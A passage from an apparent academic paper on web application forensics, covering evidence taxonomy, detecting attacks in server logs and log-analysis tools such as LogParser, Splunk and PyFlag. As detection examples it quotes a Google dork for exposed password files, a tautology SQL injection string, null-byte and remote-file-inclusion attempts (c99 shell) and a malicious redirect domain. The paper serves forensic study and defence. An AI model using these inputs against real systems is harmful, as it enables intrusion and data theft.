part prior to the deployment of the specific Web Application scanning. This combination of the two
approaches should deliver better results than those from the blind point'n'scan examinations.
Explanation of this approach is illustrated in Figures 16, 17 and Tables 10, 11, 12, given at
Appendix A. For more information, please refer to [10], or consider studying the snapshot of the
live presentation[L7].
We should designate these statements as highly applicable for the better utilization of WAFO, as
well. The lack of complete and precise knowledge of the functional structure and data flow of the
forensically observed Webapp, should definitely detain the proper and accurate implementation of
WAFO. We should keep in mind these conclusions and extend them in the following Chapters of
the paper.
Let's proceed with the more detailed representation of the Web Application Forensics.




                                                 18
3.Web Application Forensics


3. Web Application Forensics

The main task, this Chapter represents, is to proceed further with the taxonomic description of
WAFO, by describing the victim environment, e.g. to designate in detail the Web application in
production environment. This should be specifically utilized on behalf of the facts: explaining, how
Webapp forensics is applied to this environment; determining, what are the main concerning aspects
to WAFO; establishing these statements via particular examples and outlining collaborative
techniques, which extend the proper WAFO investigation. See again Table 2.
We proposed in the former Chapters that, utilizing WAFO on behalf of best practices and only
should not be considered as reasonable. Presuming this, we should emphasize further explicitly
that, trial-and-error approaches and conclusions,relying on personal experience and high-level
skills, can not be approved as sufficient requirements for proper WAFO deployment.
On the one hand we discover high information abundance, concerning the prior discussed
complexity aspects of RIA Webapps, on the other the impulse for applying appropriate WAFO on
these high-level sophisticated applications is immense.
Once again, this confirms the need for proper taxonomy- not best-practices, presenting a recipe
shaping of the Web Application Forensics investigation, but categorizations, approved to be
universally valid and compact in their representation. Let's conclude the illustration of the Webapp
forensics' categorization and extend the described taxonomic aspects heretofore.
Respecting the post mortem strategies, after intruder's attack is successfully accomplished and
damage is presented, we specify two general approaches for Webapp sanitization- Incident
Response( IR) and Web Application Forensics. In a word, the differences between them, should be
outlined as follows. The remediation scenario, applied to the compromised application and focused
on the regaining of the implementation's complete functionality, is the main concern of the Incident
Response. In distinction to this, the Forensics investigation focuses on gathering the maximum
collection of evidence, which is relevant for the IR utilization and should be employed to a court of
jurisdiction, if required.
Let's demonstrate the complete overview of the Digital Forensics structure and point out the
dependencies between IR and CFO, as well as, the dependencies between WAFO and the other
Forensics fields. This is illustrated in the next Figure 3.




                                                 19
3.Web Application Forensics




Figure 3: Digital Forensics: General taxonomy

For the reader concerned, please refer to [12], where IR and Forensics approaches are compared in
detail. More general representation on the topics IR and Forensics should be found at [1], [13], [14].
In this way of thoughts, we should derive and should specify the following fundamental
questions( *), concerning WAFO:
   1. how can we describe an environment as ready for Forensics investigations,
   2. what evidence should we look for and
   3. what is the definition of their location,
   4. how can we extract the payload of the Forensics evidence raw data, concerning its proper
      application in the further steps of IR.
Let's designate the general procedure in the implementation of WAFO. The next Figure 4:




                                                  20
3.Web Application Forensics




                            Figure 4: WAFO phases, in Jess Garcia[1]



This illustrates, respecting the universal validity, the following steps in the WAFO deployment:
   •   seizure- the problem should be designated,
   •   Preliminary Analysis- preparation for the specific WAFO investigation,
   •   Investigation/ Analysis loop- analyzing the collected evidence and proceeding in this
       manner till the collection of those is maximal and complete
In this way of thoughts, we should underscore the Standard Tasks, WAFO is utilizing, as in [15]:


        1. Understand the “normal” flow               2. Capture application and server
           of the application                            configuration files
        3. Review       •    Web Server               4. Identify        •   Malicious input from client
           log                                           potential       •   Breaks in normal web
           files:                                        anomalies:          access trends
                        •    Application                                 •   Unusual referrers
                             Server
                                                                         •   Mid-session changes to
                                                                             cookie values
                        •    Database Server          5. Determine a remediation plan
                        •    Application

Table 5: Web Application Forensics Overview, in [15]


Let's categorize the evidence, as an argumentation to the second fundamental question, see (2,*), in
Table 6:




                                                 21
3.Web Application Forensics

                                      Digital Forensics evidence:
    •   Human Testimony                                             •   Peripherals
    •   Environmental                                               •   External Storage
    •   Network traffic                                             •   Mobile Devices
    •   Network Devices                                             •   … ANYTHING !
    •   Host: Operating Systems, Databases, Applications
Table 6: A general Taxonomy of the Forensics evidence, in [1]


To specify the source of the different Forensics evidence, see (3,*), we should clarify the 'Players',
as Jess Garcia in [1], contributing to the Layer 7 communication as follows, see Table 7:


                 Type of 'Players':                 … and their Implementation in the Web traffic:
                                                    Network Traffic
                     Common                         Operating Systems
                    Client Side                     ( Web) Browsers
                                                    Web Servers
                    Server Side                     Application Servers
                                                    Database Servers
Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1]


A reasonable WAFO should present an inspection/ analysis of all evidence these 'Players' produce,
which consists of: inspecting the Network traffic logs( inspecting logs of supportive Applications as
NIDS, IDS, IPS), analysis of the hosts OS logs( incl. HIPS, HIDS, Event logs etc.), header and
cookie inspection of the users' Browsers, inspection of the Server logs, belonging to the Web
Application Architecture, cache inspection etc. As we propose in the former Chapter 2, this should
not be a simple task, especially when the Webapp is highly process-driven( e.g. AJAX, Silverlight,
Flash etc.). This should require additional application-flow analysis, which considers an explicit
knowledge, respecting the functional- and data- flow map of the Webapp. The human factor should
not be underestimated in this regard. Finally, there is also the important matter of the legal aspects,
related to the deployment of the WAFO investigation, which the security professional should be
aware of and should maintain during the Web Application Forensics process. We should not discuss
this matter in detail. The interested reader should find more information, concerning this topic at
[16] and also, as already proposed, in [7]. With respect to the forth fundamental question, see (4,*),
focusing on the evidence payload extraction, we should discuss this more detailed in the next
Section 3.1. of this Chapter.
To conclude this discussion, we should consent to argue the leading fundamental question, pointing
out the Forensics readiness concerns, see (1,*).


                                                  22
3.Web Application Forensics



An environment, which is not prepared for Forensics investigation in an appropriate manner:
   •   application logging is not present or not adequate adjusted,
   •   no kind of supportive forensic tools are applied to the WAFO environment( IDS/ IPS etc.),
   •    users are not well trained for Forensics collaboration;
could detain the Web Application Forensics investigation in a way that, the evidence collection is
considerably incomplete and WAFO could not be anted to the environment, at all [1]. That's why,
the matter of Forensics Readiness should be approved as fundamental in the taxonomy of WAFO,
concerning the Preliminary Analysis phase of the Web Application Forensics deployment.
An illustrative example of the Forensics Readiness, should be found in [13], referenced in Appendix
A, Figure 18. As we specified the general taxonomy, respecting WAFO victim environment, let's
proceed with further examples, designating the deployment of different Web Application Forensics
techniques. On one hand, they demonstrate in a more illustrative manner the paper's exposition; on
the other, refer to the reasonable question argumentation on how WAFO payload data is gained
from evidence in practice.

3.1. Examples of Webapp Forensics techniques

In this Section we should describe different cases of WAFO deployment, concerning Client Side
and Server Side forensics analysis, on given real-life examples, organized as follows: main topic,
possible attacks, WAFO techniques illustration.


Extraneous White Space on the Request Line


This example is discussed in [3], which provides evidence for anomalies in HTTP requests, stored
in the Webapp server log. The whitespace between the requesting URL and the protocol should be
considered as suspicious. In the next Figure is illustrated a poorly constructed robot, which
obviously intends to accomplish a remote file inclusion:




Figure 5: Extraneous White Space on Request Line, in [3]

Google Dorks


Exploiting the Google search capabilities, may be illustrated with the next search query [3]:



                                                  23
3.Web Application Forensics

intitle:”Index of” master.passwd
The produced evidence should appear in the server logs as follows:



Figure 6: Google Dorks example, in [3]

The author of the book [3] states, that such requests are still very un-targeted, because of the fact
that such requests are chaotic, in term of, the target is not explicitly specified in the search query.
Nevertheless, they should not be considered underestimated. In respect to this, follows the next
example, produced by spammers, utilizing the Google search engine for the same purpose:



Figure 7: Malicious queries at Google search by spammers, in [3]

Faking a Referring URL
A great21 job for faking Referrer URL22 credentials is done by spammers. In the next example the
faked part of the URL is presented in the anchor identifier, which is unique for accessing different
parts on the displayed web page content. Such GET requests should not be approved as valid log
file entries via clicks on the Web page, because the Web server reproduces the whole Web page and
do not matter explicitly about its content, thus such log entry should be determined as malicious and
, once again to be mentioned, not produced by a regular Web surfing activity:


Figure 8: faked Referrer URL by spammers, in [3]

Remote File Inclusion
A good example for Common Request URL Attacks could be illustrated by the next Remote File
Inclusion( RFI)23 attempt stored in the Web Server log:


Figure 9: RFI, pulling c99 shell, in [3]

The attempt to pull the well known c99 shell on the running machine on behalf of a GET Request is
obvious. The c99 shell is classified as a malicious PHP backdoor. There is a great likelihood that,
Web intruders try to inject and execute such kind of code on Open Source PHP Webapps, like
different PHP-based CMSes, or PHP-forums. In most cases RFIs are deployed to extend the
structure of compromised machines and support the utilization of botnets.


21 'great job' in terms of, discussing the algorithmic approach as security professionals and by no means as favoring the
   malicious intentions of the Cyber criminal
22 RFC 1738
23 http://projects.webappsec.org/w/page/13246955/Remote-File-Inclusion

                                                           24
3.Web Application Forensics

Another reason for RFI is the attempt to execute code on compromised machine and gain access to
sensitive data on it.
A simple Classic SQLIA
The following general example illustrates the utilization of SQLIA [4] on a PHP Webapp on behalf
of a malicious GET request:




Figure 10: Simple Classic SQLIA, in [3]

The intruder tries to compromise the 'admin' account on the Webapp, utilizing Tautologies Classic
SQLIA: ' password= ' or 1=1 - - '. To utilize: the apostrophe, the white spaces and the equals sign
ASC II characters, in the GET request, these are substituted as follows: %27, %20 and %3D, via
their URL Encoding representatives.


NULL-Byte-Injection
A NULL-Byte-Injection( NBI)24 could be also accomplished on behalf of a GET Request, as:




Figure 11: NBO evidence in Webapp log, in [3]

In the same manner as in the former example the Null ASC II character is URL encoded here by
%00. The attack tries to compromise the Perl login.cgi -script and utilizing the NBI to open the
sensitive .cgi file.
The provided examples illustrate different header inspection cases as part of the Server Side
Forensics.
This list can be extended by further paradigms, related to user client Browser investigation
techniques: Browser Session-Restore Forensics [17] and Cookie inspection etc. Though, we should
not consider further illustrations of WAFO techniques in this section, with respect to the marginal
boundaries of the term paper. The interested reader should refer to [3] and [15] for more
information. Let's proceed with an example, concerning the WebMail forensics.

3.2. WebMail Forensics

Web based Mail( WebMail) represents a separate construct in an Web Application. Furthermore,
many firms deploy Web based mail services, like: Yahoo, Amazon etc. Moreover, the WebMail
denotes another data input source on a Webapp, therefore, the strive for compromising Web based
Mail implementations still matters. The next Figure 12 illustrates a faked ( spam) e-mail:


24 http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection

                                                       25
3.Web Application Forensics




Figure 12: HTML representation of spam-mail( e-mail spoofing)

This should designate the last case study in the examples exposition. The spam-mail should be
considered as representative of one of the most utilized attacking techniques, concerning WebMail-
e-mail spoofing. We should illustrate according to this a fragment of the mail header, see Figure 13:




Figure 13: e-mail header snippet of the spam-mail in Figure 12


                                                 26
3.Web Application Forensics

Furthermore, a diffrent supportive attacking technique designate the e-mail sniffing, which should
not be discussed in this paper. For the reader concerned, please refer to [18], [19]. The Author of the
paper receives the illustrated spam-mail in January 201125. Let's demonstrate a WebMail header
inspection on the given example, as in Figure 13 already shown, which should explain the e-mail
stuffing attempt. On one hand, inspecting the Received- header the domain appears to be valid and
belongs to facebook.com26; on the other, the Return-Path- header, as well as the X-Envelope-
Sender- header reveal a totally different sender. The domain, specified there, appears to belong to a
home building company in the US. Moreover, there is another domain very similar to the one in the
example: 'cedarhomes.com.au'. Inspecting as next the Sender header, the sender name appears to be
a common name in Australia27. The correlation of the evidence is illustrative. More important, the e-
mail-spoofing attempt is identified.
A different crucial matter also concerns the discussed spam-mail. A more detailed investigation on
the HTML- content of the spam e-mail, provoked by the suspicious appearance of the Hyper-Link
'here', as in Figure 12, the second row from the bottom of the HTML mask: '…, please click here to
unsubscribe.'; reveals the following dangerous HTML-Tag content, see next Figure:




Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12

It appears to be that, the spam-mail is intelligently devised, as the intruder is not actually interested
only in spamming the e-mail accounts. With greater likelihood, a receiver, who does not use social
platforms, or just dislike to receive such e-mails, should click on the un-subscribing link, which
should lead him to a malicious site. Modern versions of Mozilla Firefox Browser can detect the
compromised and malicious domain 'promelectroncert.kiev.ua' and warn the Browser user right on
time,as appropriate. This interesting example illustrates the argumentation, explaining why should
WebMail Forensics matter.
Thus, we conclude this section and proceed to the last part of this Chapter 3, concerning aspects on
collaborative approaches from the other Forensics investigation fields, supporting WAFO.

3.3. Supportive Forensics

In this section we should discuss briefly the supporting part of Network, Digital Image and (OS)-
Database Forensics, extending the evidence collection for WAFO investigation. The presence of log
data, derived from IDS/IPS prevention systems, supports the more precise detection of the intruders'
activities on the Webapp and IP provenance. The amount of noise over the network, the intruder
produces, is sufficient as described formerly, to determine properly the violator's profile. In some
cases, Forensics investigations on digital images uploaded to a compromised Web Application
should lead to the successful detection of the intruders' origins.
25 At this point,the author of the paper should like to express his gratitude to Rechenzentrum at Ruhr-University of
   Bochum, for the successful sanitization of the spam-mail, utilizing spam-assassin right on time,
   http://www.rz.ruhr-uni-bochum.de/ , http://spamassassin.apache.org/
26 http://www.mtgsy.net/dns/utilities.php
27 http://search.ancestry.com.au

                                                          27
3.Web Application Forensics

This denotes once again the reasonable suggestion for extensive correlation of the different payload
as forensic evidence, which should reduce false positives appearances in the results and
consequently to this, more precise attacking detection should be achieved.
A very interesting example is pointed out in [3], page 285, concerning the Sharm el Sheikh Case
Study.
At last, we should also mention the notable case, in which WAFO is detained, because of the lack of
sufficient Database log data. Root for such issues could be: the proper utilization of concealing
techniques a Web intruder applies to cover the attacks' traces, malfunction in the Database engine,
lack of proper WAFO Readiness utilization- logging capabilities of the RDBMS are not adequate
adjusted etc. In such cases the WAFO successful examination of compromised RDBMS as a Back-
End to a Webapp is constitutive doubtful. Nevertheless, if the RDBMS Application Server has not
been restarted since the time prior to the moment as the Attacking Scenario is executed, there is a
reasonable chance to extract important forensic evidence from the RDBMS plan cache. This
essential approach is discussed in detail in [16].
We discuss in this Chapter techniques for deployment of WAFO, which should be considered as
manual techniques. If the observed environment is compact and the amount of sufficient evidence,
could be examined by a human in acceptable time and efforts, expanding the collection of such
forensic techniques is undeniably fundamental and relevant.
For all that, there are many cases, concerning modern Webapps, in which the observation of the log
files exceeds the human abilities, like the capacity of logs provided by Web Scanners equal to a
couple of Gigabytes[L8].
Another example is the utilization of WAFO investigation accomplished rapid in time.
In such cases the questions, concerning the utilization of automated tools, enhancing the
deployment of Webapp forensics, become undoubtedly significant.
Let's introduce in the next Chapter 4 such tools, respecting WAFO automation techniques.




                                                 28
4.Webapp Forensics tools


4. Webapp Forensics tools

In [13], Jess Garcia proposes a categorization of the Forensics approaches, separating them in two
classes: Traditional forensics methods and Reactive forensics methods. A good illustration of the
main parameters, designating the two classes, is represented in the next Table, derived from [13]:
Traditional Forensics Approaches:                  Reactive Forensics Approaches:
    •   Slow                                          •   Faster
    •   Manual                                        •   Manual/ Automated
    •   More accurate( if done properly)              •   Risk of False Positives/ Negatives
    •   More forensically Sound                       •   Less forensically Sound( ?)
    •   Older evidence                                •   Fresher evidence
Table 8: Traditional vs. Reactive forensics Approaches, in [13]

According to the examples in Chapter 3, we should clarify that, the detection of those could be
established only by well trained security professional in acceptable matter of time. Manually
deployed WAFO investigations should be determined as very precise with less false tolerance,
though only if applied appropriate. As mentioned above, the complexity of the current Web
Attacking Scenarios drives the investigation process to be unacceptable, respecting the time aspect.
Business Webapps do not tolerate down-time, which is undoubtedly required that, the Webapp
image should be processed for reasonable WAFO. This designates the dualistic matter of Web
Application Forensics investigation: slow and precise versus faster and error prone.

On one hand WAFO should be deployed uniquely for every single case of compromised Webapp,
on the other the utilization of new techniques, as employment of automated tools in the WAFO
investigation, should gain without a doubt new( 'fresher') forensic evidence. This is very important,
concerning the maximal Forensics evidence collection, as already proposed. In this way of thoughts,
we should explain the fact that, the utilization of new automated techniques in WAFO, is only
acceptable in case of the proper training prior to their implementation in production environment. It
is crucial to know the particular features of the automated tool, which should be utilized; to know
the reactions of the Webapp environment as the tool is implemented to it; to know the level of
transparency, concerning the distance between the raw log files data and the tool's feedback as
evidence payload etc. Let's illustrate some of the fundamental requirements parameters, considering
WAFO automated tools as appropriate for their enforcement in the Forensics investigation process.

4.1. Requirements for Webapp forensics tools

An essential categorization of the requirements for WAFO automated tools is given by Robert
Hansen in [L9]. We should designate them as tool's requirements rules( TRR), as follows:
   1. an automated tool candidate for WAFO should be able to parse log files in different formats
   2. it should be able to take two independent and differently formatted logs and combine them


                                                 29
4.Webapp Forensics tools

    3. the WAFO tool must be able to normalize by time
    4. it should be able to handle big log files in the range of GiB
    5. it should allow utilization of regular expressions and binary logic on any observed parameter
       in the log file
    6. the tool should be able to narrow down to a subset of logical culprits
    7. the automated tool should allow implementation of white-lists
    8. it should allow a probable culprits' list construction, on which basis the security investigator
       should be able to pivot against
    9. it should be also able to maintain a list of suspicious requests, which should indicate a
       potential compromise
    10. the WAFO tool should utilize, decoding of URL data so that, it can be searched easier in
        readable formate
As we should experience in the further Sections of the Chapter, we should consent that, the
compliance of the heretofore enumerated requirements is still unfeasible.
Let's represent a short explanation of them, which should define them as an appropriate constitutive
basis.
No matter, if the specific tool imply all of these requirements, or not, this should support a more
appropriate categorization of its skills and utilization area(s). As current Webapps require, with
reasonable likelihood, more than one different Web- Servers( for example), parsing the different log
formats, could be not an easy task. This is a fundamental reason to decide, whether it is more
appropriate to utilize specialized tools, related to the specific log- file format, or to seek further for
an application, with wide variety of supported log- data formats. Two sufficient candidates are:
Microsoft IIS file format and Apache Web server log data format28. In this way of thoughts, the
concern is important, stressing the fact, how to combine the raw data from such concurrent running
different Web- Servers to achieve a better correlation of the evidence, provided by the proper
extraction of the payload from their log data.
Furthermore, to outline coincidences, we should consider proper investigation on time-stamps.
A normalization on time is crucial.
The matter of the current amount of collected log files is discussed enough heretofore and clearly
sufficient.
The aspects, explaining the utilization of Regular Expressions, should be designated as crucial too.
To illustrate this, let's mention the fact, respecting the differences in the implementations of
Regular Expressions on Black- Lists basis and those on White- Lists basis, which employs a further
parameter in the requirements list. The white- listing utilization should concern cases, in which the
traced payload should express a well-defined construction. If the observed input string differs from
this limited form, it should be outlined as suspicious. Example, Regular Expressions( RegEx) for
filtering of tamper data of input fields in Webapp as login-ID from an e-mail type.
On the contrary, the Black- listing specifies, what kind of construct is wrong and suspicions as
default. Such filters could be eluded in a simple manner by altering in an appropriate way of the
injection code, so the RegEx should fail with greater likelihood to detect it properly. It is a very

28 Statistics for the utilization of the different Web- Server should be found at: http://news.netcraft.com/

                                                            30
4.Webapp Forensics tools

controversial task to define a Black- List RegEx, which is covering a class of malicious strings and
sustain precise('fresh'). Furthermore, it is a challenge to implement a forensics tool with minimal
and compact collection of malicious signature, which should be able to sustain universally valid.
Probability analysis, supporting a right on time detection of malicious signature, is a further
challenging topic.
Moreover, it should be very useful, if the tool is expendable by the forensics investigator, in terms
of the security professional is allowed to refresh and update the list of malicious payload detecting
RegExes manually. In the examples in Section 3.1. and 3.2. the illustration of the importance of
proper URL- Encoding is designated and requires no further discussion on it.
These conclusions advocate the statement that, TRR1 up to TRR 10 are relevant and fundamentally
important for proper WAFO.
Let's present a couple of interesting examples of particular WAFO automated tools candidates in the
next Sections 4.2. and 4.3.. As tools' requirements basis is already specified, we should classify the
tools in general into Open Source and proprietary ones and describe an appropriate tuple of those
accordingly.

4.2. Proprietary tools

As we discuss Business related Webapps as sufficient criterion, we should describe at first the
Business-to-Business implementations of WAFO automated tools. Current representatives in this
class should be enumerated as follows: EnCase[L10], FTK[L11], Microsoft LogParser[L12],
Splunk[L13] etc. According to the WAFO tools requirements the author of the paper deliberates the
following favorites in this category, see further.


Microsoft LogParser


This forensics tool is developed by Gabriele Giuseppini29. A brief history of MS LogParser is given
at [L15],[L16]. The application can be obtained and utilized for free, see [L12], though as [L14]
Microsoft rather designate it as “skunkware” and dislike to give an official support for it. Current
version of the tool is LogParser 2.2, released at 2005. An unofficial Support site, concerning the
tool should be found at: www.logparser.com30.
The parser includes in general the following 3 main units: an input engine, a SQL-like query engine
core and an output engine. A good illustration of the tool's structure is given at [L16], see further
Appendix B, Figure 19. MS LogParser utilizes support for many autonomous input file formats: IIS
log files( Netmon-Capture-logs), Event log files, text files( W3C, CSV, TSV, XML etc.), Windows
Registry databases, SQL Server databases, MS ISA Server log files, MS Exchange log files, SMTP
protocol log files, extended W3C log files( like Firewall log files) etc. Another achievement of the
tool is, it can search for specific files in the observed file system and also search for specific Active
Directory objects. Furthermore, the input engine can combine payload of the different input file
formats, which allows a consolidated parsing and data correlation, thus TRR 1 and TRR 2 are
satisfied. Acceptable input data types are: INTEGER, STRING, TIMESTAMP, REAL, and NULL,

29 http://nl.linkedin.com/in/gabrielegiuseppini
30 Unluckily at the present moment this site seems to be down.

                                                         31
4.Webapp Forensics tools

which satisfies TRR 3. As [L17] parsing of the input data is achieved in efficient time, which
designates another positive feature of the tool. As the data is supplied to the core engine, the
Forensics examiner is allowed to parse, utilizing SQL-like queries. As default, this is implemented
on behalf of a standard command line console, explicitly explained in [21]. Before illustrating this
via example, let's mention that, there should be unofficial front-ends providing more user-friendly
GUIs, like: simpleLPview0031. However, as the domain logparser.com seems to be down at the
paper's development phase, the author of the paper isn't able to utilize tests on the GUI front-end.
For the reader concerned, the GUI versions of MS LogParser aren't limited to that front-end.
Developers can extend the MS LogParser UI via COM- objects, see [L15], which enables the
Forensics professional to extend the tool's abilities by programming custom input format plug-ins.
Let's illustrate the MS LogParser syntax, see [L15]:
C:Logs>logparser "SELECT * INTO EventLogsTable FROM System" -i:EVT -o:SQL
-database:LogsDatabase -iCheckpoint:MyCheckpoint.lpc


The following example, represents a SQL-like query, where the input file format specified by -i
concerns the MS Event logs; the output format is SQL, which means the results are stored in a
database and could be filtered further as appropriate. An important option is -iCheckpoint, which
designates the ability for setting checkpoint on the log files and thus achieve an incremental parsing,
on the observed log data, which increases the efficiency on parsing large log files and satisfies in
some way the TRR 4. The next example demonstrates, see [L15]:
C:>logparser "SELECT ComputerName, TimeGenerated AS LogonTime,
STRCAT(STRCAT(EXTRACT_TOKEN (Strings, 1, '|'), ''), EXTRACT_TOKEN(Strings, 0, '|'))
AS Username FROM SERVER01 Security WHERE EventID IN (552; 528) AND
EventCategoryName = 'Logon/Logoff'" -i:EVT


a simple string manipulation, which could be extended by RegExes and satisfies TRR 5, 7.
Different interesting paradigms can be found at [15], [L15], [L16], [L17].
Another notable aspect of the MS LogParser is its ability to execute automated tasks. One approach
is to write batch-jobs for the tool and make system scheduler entries for their automated execution,
please consider [L14]. Furthermore, the examiner can utilize windows scripting on MS LogParser,
as [L17]. Appendix B, Figure 20 illustrates this. The standard implementation scenario is given as
follows, see [L17]:
    •   register the LogParser.dll
    •   create the Logparser object
    •   define and configure the Input format object
    •   define and configure the Output format object
    •   specify the LogParser query
    •   execute the query and obtain the payload
This briefly introduction of the MS LogParser demonstrates its mightiness without a doubt.
However, we should consider the tool as appropriate only concerning MS Windows based
31 http://www.logparser.com/simpleLPview00.zip

                                                   32
4.Webapp Forensics tools

environments, such as .asp, .aspx, .mspx Web applications.
An open question remains, regarding the proper examination of Silverlight implementations.
Another possible issue could be the iCheckpoint, configuring the incremental parsing jobs. Locating
the .lpc configuration file(s) could easily lead the intruder to the log files, related to the forensics
jobs, which should be exploited straight ahead.


Splunk


This tool is developed and maintained by Splunk Inc32. It's current stable release is 4.2.2, 2011.
Although the professional version of the tool is high priced, there is a test version for the limited
time of 30 days and a bounded amount of parsed log files up to 500 MB. The test version can be
employed for free. Furthermore, there is a community support, concerning Splunk as a mailing list
and Community Wikipedia, hosted on the Splunk Inc. domain. Official support regarding Splunk
documentation, version releases and FAQ/ Case studies is presented at the tool's website, which
require a free registration.
Another advantage of Splunk is the on-the-fly Official-/Community-IRC-Support. Next interesting
feature is the users' and official professionals' uploaded Video-tutorials, demonstrating specific
usage scenarios and case studies.
The tool has wide OS support: Windows, Linux, Solaris, Mac OS, FreeBSD, AIX and HP-UX.
Splunk can be considered as a highly hardware consuming application33. It was tested on an Intel
Pentium T7700 with 3GB of RAM machine under Windows XP Professional SP3 and Ubuntu
Linux 10.04 Lucid Lynx. In both of the cases the setup runs flawlessly with less additional
installation effort on the user's side. After successful installation Splunk registers a new user on the
host OS, which can be deactivated. The tool represents a python based application. It antes a Web
server, an OpenSSL server and an OpenLDAP, which interact with the different parsers for input
data. The configuration of the different Splunk elements is implemented via XML, which allows
them to be userfriendly adjusted. Splunk has even greater input format support than MS LogParser,
which designates the tool as not only OS independent, but also input format all-round. An
interesting combination of Splunk with Nagios is discussed at [L18]. A screenshot of the official
deliberated features of the tool is illustrated at Appendix B, Figure 21. These aspects relate to the
TRR 1, 2, 3, 4, 5. TRR 7, 9, 10 should be tested more extensive in particular.
The user interaction with Splunk is utilized via common Web-browser. The different Splunk
elements are organized on a dashboard, which allows to be reordered and organized in an user-
friendly manner.
Let's represent more detailed the main Splunk units. Their description is based on [L19], which
concerns Splunk version 3.2.6. Although after ver. 4.0 Splunk is completely rewritten, the main
Business logic units sustain.
In general, the idea behind this tool is not only to parse different log file formats and support
different network protocols, but also to index the parsed data. Thus, the tool impersonates a
valuable search engine, like those largely known nowadays on the Internet. This allows the user to
accomplish more userfriendly and precise searches on specific criterion. Indeed, the query
responses from the tail- dashboard are significantly fast. Intuitively, we designate the first Splunk
32 http://www.splunk.com/
33 http://www.splunk.com/base/Documentation/latest/installation/SystemRequirements

                                                      33
4.Webapp Forensics tools

unit- the index engine. It supports SNMP and syslog as well. Consequently to this, the second unit
represents the search core engine. One can include different search operators on specific criterion
like Boolean, nested, quoted, wildcards, which respects as already stated TRR 5 and 7. The third
unit is the alert engine, which somehow satisfies TRR 9. The notifications can be sent via RSS,
email, SNMP, or even particular Web hyperlinks. In addition to this, the fourth unit implements the
reporting ability of Splunk, TRR 2 and 3. On a specific prepared dashboard the user/ forensic
examiner can not only gain detailed results on the parsed payload in text formate, but also gain
derived information as interactive charts and graphs, and specific formated tables according to the
auditing jobs. These are well illustrated in Appendix B, Figure 22. An interesting example describes
the reporting abilities of Splunk to detect JavaScript onerror entries, on behalf of user-developed
json- script, see [L22].
The fifth and last unit represents the sharing engine/ feature of Splunk. This explains the strive for
users' collaborative work on behalf of this tool, where as know-how exchange is encouraged.
Another motivation for this unit is a distributed Splunk environment, where not only single instance
of Splunk is serving the specific network. Further abilities of the forensic tool should be mentioned
as: scaling the observed network and security of the parsed data.
This last feature is important to be discussed more detailed. An open question remains, as denoted at
MS LogParser, whether the tool is hardened enough on itself, considering the fact that, the large
payload data it is not only indexed, but also userfriendly represented. As Splunk is without a doubt
an interface to every log file and protocol on the observed network, it is highly likable to get this
bonding point compromised. If an attacker succeeds in this matter, one can get every detail, related
to the observed network represented in an userfriendly format, which disburdens the intruder to
collect valuable payload data and minimizes his/ hers penetration efforts. As the Splunk front-end is
represented via Web-browser, intuitively the reader concerned, can notice that,
CSRF [4] and CSFU [L20] could be respectable candidates for such attacking scenarios, especially
combined with DOM based XSS attacks [20], [L21], which can trigger the malicious events in the
Browser engine. If such scenarios could be achieved, then Splunk could alter into a favorite jump-
start platform for exploiting secured networks, instead of to be utilized as appropriate forensic
investigation tool. This designates an essential aspect, concerning the future work on WAFO. We
should not extend this discussion further as it goes beyond the boundaries of the present paper.
Let's introduce the selected Open Source WAFO tools, as mentioned above.

4.3. Open Source tools

At first let's describe PyFlag.


PyFlag


As at the previously described tool, there is a team behind the PyFlag development: Dr. Michael
Cohen, David Collett, Gavin Jackson. The tool's name represents an abbreviation of: python based
Forensic and Log Analysis GUI. PyFlag is another python implementation of forensic investigation
tools, which utilizes as a Front-end for the user the common Web-browser. Current version of the



                                                 34
4.Webapp Forensics tools

tool is pyflag-0.87-pre1, 2008. The tool is hosted at SourceForge34 and as an Open Source App it
can be obtained for free under the GPL. A support site is considered to be www.pyflag.net. This
domain also stores the PyFlag Wiki with presentations of the tool and video tutorials. A different
advantage is the predefined for examination forensics image also hosted on the support site. This
image can be employed for the purposes of training on forensic investigation.
The general structure of the tool can be described as follows. The python App antes a Web Server
for displaying the parsing output and further, the collected input data is stored in a MySQL server,
which allows the tool to operate with large amount of log files code lines, respecting TRR 4. The IO
Source engine designates the interface to the forensic images, which enable the tool to operate with
large scale input file types, as Splunk.
As the observed image is loaded by the Loader engine in the Virtual File System, different scanners
can be utilized for gaining the forensic relevant payload from the raw data. For the reader
concerned, please refer to [L26]. The main PyFlag data flow is illustrated in the next Figure 15:




Figure 15: Main PyFlag data flow, as [L26]

PyFlag is natively written to support Unix-like OSes. A Windows based port is currently presented
on the support Web site, PyFlagWindows35. This makes the tool OS independent as well. The
PyFlag developers state that, the tool is not only a forensic investigation tool, but rather a rich
development framework. The tool can be used in two modes: either as a python shell, called
PyFlash, or as a userfriendly Web-GUI. The installation process requires some user input; more
detailed, common installation routines like: unpacking the archive to a destination on the host OS,
configuring the source via ./configure on Linux systems, checking for dependency issues and
utilizing the make install, are demanded.
The first start of the tool requires from the forensics investigator to configure the MySQL
administrative account and the Upload directory. This location is crucial for the forensics images,
which should be observed. In general PyFlag represents: a Web Application forensic tool( log
files) , Network forensic tool( capture images via pcap) and an OS forensic investigation tool. As
we denoted in the introduction of the paper, we should only concentrate on the log files analysis by
PyFlag, discerning its other features considering NFO and OSFO( Operating System Forensics).
The authors of the tool encourage the forensics investigators to correlate the different evidence from
WAFO, NFO and OSFO, as it was proposed already before.

34 http://sourceforge.net/
35 http://www.pyflag.net/cgi-bin/moin.cgi/PyFlagWindows

                                                     35
4.Webapp Forensics tools

More detailed, PyFlag supports variety of different and independent input file formats like: IIS log
format, Apache log files, iptables and syslog formats, respecting TRR 1, 2 and 3. The tool supports
also different kind of level of the formats customization, e.g. Apache logs can be formatted by
default, or customized by the security professional.
Let's explain this. After the installation is completely set up, the user can work with the Browser-
Gui PyFlag environment. For analyzing a specific log file, PyFlag presents presets, which are
templates, allowing to parse a collection of a specific class log files, e.g. IIS log file format. The
preset controls the driver for parsing the specific log as appropriate. As standard routine for an IIS
log file analysis set up is described in [22], as follows:
    •   Select “create Log Preset” from the PyFlag “Log Analysis”- Menu
    •   Select the “pyflag_iis_standard_log” file to test the preset against
    •   Select “IIS” as the log driver and utilize the parsing
A more extensive introduction to the WAFO utilization of the tool is presented at Linux.conf.au,
2008, please consider watching the presentation video [L23]. After the tool starts to collect payload
data from the input source, the Forensics investigator can either employ pre-defined queries and
thus minimize the parsing time on-the-fly, or wait for complete data collection. The data noise in the
